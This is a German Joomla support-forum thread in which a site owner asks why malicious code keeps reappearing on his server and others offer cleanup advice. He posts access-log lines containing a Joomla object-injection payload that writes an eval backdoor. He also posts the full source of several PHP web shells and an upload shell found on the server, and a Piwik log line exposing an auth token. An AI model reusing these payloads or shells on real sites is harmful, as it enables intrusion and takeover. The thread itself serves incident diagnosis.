immer wieder fremdcode in den Dateien

    hallo,
    muss jetzt auch mal was öffentlich machen, ich habe seit ende Dezember 15 das problem, das immer wieder code in meinen joomla installation geschrieben wird.
    es wurde, laut provider spam verschickt, dieser sperrte daraufhin die Seite.
    hab da noch versucht alles händisch zu suchen, hab alle Dateien verglichen, angesehen etc, aber kurz dadrauf das gleiche, neue Einträge, andere Dateien und und


    nun hab ich in den log Dateien andere Einträge gefunden,die ich hier gern posten möchte, um zu erfahren, was da grad passiert.


    wie soll, kann ich das hier posten?


    danke
    hans

    dies steht in einer log datei:


    Code
    173.255.143.235 - - [25/Feb/2016:07:38:19 +0100] "GET /administrator/index.php?1=%40ini_set(%22display_errors%22%2C%220%22)%3B%40set_time_limit(0)%3B%40set_magic_quotes_runtime(0)%3Becho %27-%3E%7C%27%3Bfile_put_contents(dirname(%24_SERVER%5B%27SCRIPT_FILENAME%27%5D).%27/administrator.php%27%2Cbase64_decode(%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27))%3Becho %27%7C%3C-%27%3B HTTP/1.0" 200 6660 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"


    und auch:


    Code
    173.255.143.235 - - [25/Feb/2016:07:38:21 +0100] "GET /administrator/index.php?1=%40ini_set(%22display_errors%22%2C%220%22)%3B%40set_time_limit(0)%3B%40set_magic_quotes_runtime(0)%3Becho %27-%3E%7C%27%3Bfile_put_contents(dirname(%24_SERVER%5B%27SCRIPT_FILENAME%27%5D).%27/administrator.php%27%2Cbase64_decode(%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27))%3Becho %27%7C%3C-%27%3B HTTP/1.0" 200 6660 "-" "Python-urllib/2.7"


    zudem noch dies, hat mit piwik zu tun:


    Code
    204.79.180.129 - - [25/Feb/2016:06:58:50 +0100] "GET /analytics/piwik.js HTTP/1.0" 200 54851 "http://www.unkenntlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"
84.200.72.27 - - [25/Feb/2016:06:58:54 +0100] "GET /analytics/?module=API&format=csv&convertToUnicode=0&method=CoreAdminHome.runScheduledTasks&trigger=archivephp&token_auth=4d6fb6c814cbb999c1e48da4c7ef70a6 HTTP/1.0" 200 793 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"
204.79.180.47 - - [25/Feb/2016:06:58:51 +0100] "GET /analytics/piwik.php?action_name=Home&idsite=1&rec=1&r=023429&h=21&m=58&s=49&url=http%3A%2F%2Fwww.unkenntlichgemacht.at%2Findex.php%2Fen%2F&_id=9fedede3a5373f25&_idts=1456379930&_idvc=1&_idn=0&_refts=0&_viewts=1456379930&send_image=0&res=1024x768&gt_ms=2 HTTP/1.0" 204 - "http://www.unkenntlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"


    reparieren werde ich da wohl keine installation mehr, werde komplett neu erstellen, andere templates etc.


    ich möchte nur rausfinden, wo und wie die reinkommen....


    danke,hans

    Hallo @benzomat,


    es ist nicht ganz einfach, eine von Schadcode befallene Webseite dauerhaft wieder "sauber" zu bekommen - hier gibt es Fachleute.


    Sind die eigenen Kenntnisse ausreichend, so kann man sich beispielsweise anhand eines Leitfadens (z.B. http://www.joomla-security.de/joomla-gehackt-was-tun.html) um die Behebung des Problems kümmern.


    Einfallstore gibt es viele: Sicherheitslücken in einer alten Joomla!-Version, unsichere Joomla!-Erweiterungen aber auch kompromittierte FTP-Clients etc.



    Wer wirklich herausfinden möchte, wie seine Webseite gehackt wurde, dem hilft es, zumindest einen ungefähren Zeitraum zu definieren (in vielen Fällen modifizieren die Angreifer das Erstellungsdatum der PHP-Shells nicht - so lässt sich dann einigermaßen einschätzen, wann der Angriff erfolgt ist - mit Hilfe von Access- und Error-Logs lässt sich der Angriffsweg häufig schon ausmachen).


    Der von Dir genannte Ausschnitt sieht zumindest schon einmal verdächtig aus. Hier wurde scheinbar unter anderem versucht etwas in eine Datei zu schreiben.

    Zitat von benzomat


    immer wieder fremdcode in den Dateien


    Deshalb:


    Mein Joomla wurde gehackt! Was kann ich tun?



    _____________________________________________________________________________________________________________



    Zitat von benzomat


    hab ich in den log Dateien andere Einträge gefunden,die ich hier gern posten möchte, um zu erfahren, was da grad passiert.


    wie soll, kann ich das hier posten?


    Meiner Meinung nach : Derlei Log-Einträge gar nicht posten weil das alleine nichts bringt :


    http://www.joomlaportal.de/sic…greifen-2.html#post747379


    und bei anderen Fragen:


    Wie postet man Codes in diesem Forum, mit und ohne Spoiler

    hallo ehrenwert,
    danke f+r die schnelle Antwort.
    hab grad mal per ftp auf den server geschaut, auch mal in die leeren Verzeichnisse, wo noch keine webweite installiert ist.
    selbst dort fand ich Dateien, diese sind vom 25.02., also gestern.
    wie:
    cache-55.php

    PHP
    <?php    $id = $_GET['6v4qa5'];    echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';    $s = '';    foreach(array($id) as $v){        $s.=$v;    }    ob_start($s);    if($catid){            echo $catid;    }    ob_end_flush();


    index.php
    leer


    indexs.php

    PHP
    <?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['thv5juj']) && ($www= $_POST['thv5juj']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>


    sort-55a.php

    PHP
    <?php isset($_POST['6v4qa5']) && ($www= $_POST['6v4qa5']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');


    sql-55.php

    PHP
    <?php if(md5($_GET["ms-load"])=="ae76675aca3c3ad902230a2c0965bae8"){$p=$_SERVER["DOCUMENT_ROOT"];$tyuf=dirname(__FILE__);echo <<<HTML<form enctype="multipart/form-data"  method="POST">Path:$p<br><input name="file" type="file"><br>To:<br><input size="48" value="$tyuf/" name="pt" type="text"><br><input type="submit" value="Upload">$tendHTML;if (isset($_POST["pt"])){$uploadfile = $_POST["pt"].$_FILES["file"]["name"];if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}if (copy($_FILES["file"]["tmp_name"], $uploadfile)){echo"uploaded:$uploadfilen";echo"Size:".$_FILES["file"]["size"]."n";}else {print "Error:n";}}}


    memcache-1a.php

    PHP
    <?php isset($_POST['mpwsh2']) && ($www= $_POST['mpwsh2']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');


    ach ja, was noch war, nach dem ersten problem, ende 2015, hatte ich mal geschaut welche php Versionen auf dem server laufen, hatte dann feststellen müssen, das es version von 2014 waren, laut den versionsnummern die in der joomla info steht.
    auf nachfrage, was das soll, wurde mir gesagt, Die hier angebotenen php Versionen sind gepatched. Das bedeutet etwaige Sicherheitslücken sind in der Version berücksichtigt
    dann wurde der Betreiber zum Jahreswechsel getauscht sagen wir mal, ein anderer, welcher grad am aufräumen ist.....
    dieser ist wohl dabei, diese zu aktualisieren.
    jetzt stehen schon neuere versionsnummern drinnen.


    ich gehe mal davon aus, dass das schon auch grosse Löcher geöffnet hatte....

    Schalte den Webspaceaccount ab und lösche ALLES!! Sprich ggf. Deinen Hoster an.
    Offenbar bist Du nicht in der Lage Logfiles zu analysieren, so das Du nicht feststellen wirst was passiert ist. EInmal "Joomla gehackt" im Forum oder Google eingegeben und Du hättest die ganzen Hilfen gehabt die hier schon genannt wurden. Du bist jetzt viel zu spät dran.
    Vermutlich wirst Du den Ersthack und damit einige der Backdoors auch gar nicht mehr über die Logs aus zeitlichen Gründen (zu alt) finden. Auch ein Profi wird dann scheitern und nur rumraten können.
    Überprüfe auch Deinen PC auf Trojaner! Wenn Du alles neu machst und Dein FTP-Account wird mitgelesen, dann wird jede neue Seite auch gehackt werden. Benutze keine einzige Datei des alten Accounts, es sei denn Du hast diese inhaltlich(!) geprüft.


    Warte nicht ab, bis so was passiert: Link

    hallo flotte,
    danke....


    wenn ich nicht in der Lage bin, mag sein, daher frage ich ja hier, ob mir wer sagen kann was es bedeutet!


    ich hatte diese dinge gelesen, was zu machen ist, wie die Vorgänger hier auch, die zig mal alles neu machen und leider vergeblich...


    hilfreich wäre zu erfahren, was diese logs bedeuten, kannst du mir dies sagen?


    das ich alles löschen werde, ist mir schon lange klar, ich möchte nur vorab rausfinden, wo das loch ist, oder?
    das finde ich nicht, wenn ich die Seiten neu mache, gleiche Inhalte etc und 3 tage später ist das gleiche wieder da, wie bei den vielen anderen auch.

    ich hatte leider anfangs zu dem Zeitpunkt des problems keinen zugriff auf die log Dateien.
    man war sehr umkooperativ, da grad der inhaberwechsel zum 1.1. anstand.
    zu meinem Nachteil, ich weiss....


    ich sichere nur noch meine Inhalte aus den joomla seiten, sprich die Beiträge, texte, Bilder, dann werden alle joomlas gelöscht, samt Datenbanken.


    ich denke mal, es war ein template, diese steht immer wieder in den logs, sprich die Ordner. es handelt sich um welche von favthemes.com
    ist da was bekannt?

    wie hier, und dies immer wieder nach den Dateien in dem template


    Code
    204.79.180.66 - - [25/Feb/2016:06:58:45 +0100] "GET /templates/favouritedark_hans/icons/css/font-awesome.css HTTP/1.0" 200 25296 "http://www.unkennlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"


    ok, update wurde dann gemacht, aber die hacker waren ja bereits vor dem update unterwegs....und das update entfernt ja keine bösartigen Einträge oder oder.

    das template wurde von favthemes dann in einer neuen version angeboten, allerdings klappt es nicht als update, da alles komplett anders ist....somit müsste ich eh neu machen, auch wenn ich das aktuellere template nutzen würde.


    werd mir da wohl was anderes suchen, was sicherer und auch per updates aktuell gehalten wird.
    ist nur nicht so einfach bei den vielen Anbietern.

    Code
    27.75.213.217 - - [11/Feb/2016:11:07:19 +0100] "GET /administrator/index.php HTTP/1.0" 200 8978 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
27.75.213.217 - - [11/Feb/2016:11:07:20 +0100] "POST /administrator/index.php HTTP/1.0" 303 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"


    da wurde aber nicht verändert, index.php auch vom Inhalt nicht, wie Original

    da ich grad am löschen bin, auch die Datenbanken, ist mir aufgefallen, das ich in einer joomla version eine Tabelle hab, die in den anderen nicht ist.
    es ist diese:


    core_options


    inhalt:


    Code
    a:1:{i:41;a:3:{s:6:"linked";s:1:"0";s:5:"title";s:12:"Test wp page";s:3:"url";s:64:"http://www.unkenntlichgemacht.com/index.php/2-uncategorised/41-page-98234";}}


    ist die original?